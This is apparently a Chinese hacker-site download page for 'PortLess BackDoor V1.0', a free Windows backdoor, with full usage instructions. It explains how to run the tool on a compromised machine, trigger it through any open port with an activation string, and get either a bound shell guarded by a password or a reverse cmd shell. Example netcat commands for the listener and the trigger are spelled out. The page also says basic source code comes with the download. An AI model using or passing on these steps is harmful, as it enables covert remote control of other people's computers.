| 打倒法 轮、反对分裂、拒绝色情、不结帮派,用知识武装自 己,做正义文明黑客! | ||||||||||||||||
| . | ||||||||||||||||
| 黑客基 地 | ||||||||||||||||
| 大型网络安全与游戏娱乐站 点 | ||||||||||||||||
| (网络精英创办 安全专家荟萃) | ||||||||||||||||
| 主要栏目介绍 | ||||||||||||||||
|
||||||||||||||||
|
“黑 客基地,一个好学又好玩的神秘网络空间!” - 中国黑客组织(http://www.chinahacker.org) |
||||||||||||||||
| [ PortLess BackDoor] | ||||||||||||||||
|
[软件介 绍] |
||||||||||||||||
|
PortLess BackDoor V1.0 By WinEggDrop 这是一个很简单的小后门程序,特点是程序运行后并没有打开任何端口,有两种模式:一种是在本地 绑入端口等待连接;另一种就是反向连接.原理和小榕那个BIT后门程序大致一样. 说明: 1.程序只能用于Win 2k/xp/2003,其它系统无法使用 如何使用: 后门语法:PortLess ActiveString AuthPassword ActiveString --> 这是连接上运行了这后门的那系统中任意一个打开的端口后需要输入的认证字符串 ,这相当于一个密码的作用. AuthPassword --> 这是使用本地绑入端口模式时,用户连接上去后需要输入的密码 例子1:(本地绑入模式) 在一台肉机中运行PortLess wineggdrop test,假设这台肉机的80端口是打开的,肉机IP为12.12.12.12 然后就在自己的系统中nc 12.12.12.12 80,连接上后,输入wineggdrop:1999,当后门接收到wineggdrop:1999 这个字符串后,就会绑入端口1999,并等待你的连接.然后你就使用nc 12.12.12.12 1999连接上后门打开的端 口,然后就会看到要求你输入密码,你要输入密码test才可以得到一个shell 例子2:(反向连接模式) 在一台肉机中运行PortLess wineggdrop test,假设这台肉机的80端口是打开的,肉机IP为12.12.12.12,你 自己的IP是13.13.13.13.首先你在自己的系统运行nc -l -p 1234,然后在自己的系统中输入nc 12.12.12.12 80, 看到是连接上了就输入wineggdrop|13.13.13.13:1234,然后运行了nc -l -p 1234那个cmd窗口中,你就能看到自己 得到一个反向连接的cmd的shell了. 其它说明: 在连接上肉机任一端口输入验证用的字符串,那个字符串格式是ActiveString|IP:Port,如果你要使用的是 反向连接的话,ActiveString,IP,Port都要输入;如果只是想在本地绑入端口模式,不需要输入IP,而且要注意的 是两个符号|和:,在IP前的是|,在Port前的是:,如果你弄错了,程序是不能识别的,而且ActiveString,IP和Port之 间是没有任何空格的. 基本代码在压缩包中,叫demo.c.deomo.c只是提供这种后门的原理,代码和这个后门程序是大不相同 的,demo.c只是很简单的将这种后门以最简单和马虎的代码表达出来是这样写的,而且并没有加入反向 连接部分,有兴趣者可以自己加上,反正明白了原理,写出来并不困难,而且我相信demo.c已经提供了一 个基本的框架去写这类的后门了.基本代码本身是存在一些问题的,大致问题是只是选取第一个网卡进行嗅探, 对于shell那部分也没有认真的对写,因为只是测试原理是否可行的代码,所以如果你要使用那些代码的 话,自己先看明白,然后再对部分代码进行修改. 程序的主要目的只是演示一下这样后门,并不算是一个真正的后门,所以并没有提供任可自启动代 码让程序本身可以在系统重启后都可以启动(放在run,runservices或写成服务等). |
||||||||||||||||
|
[注册说 明] |
||||||||||||||||
|
免费 |
||||||||||||||||
| . | ||||||||||||||||
| 谨请自觉遵守中华人民共和国法律,违者 后果自负! | ||||||||||||||||
黑客基地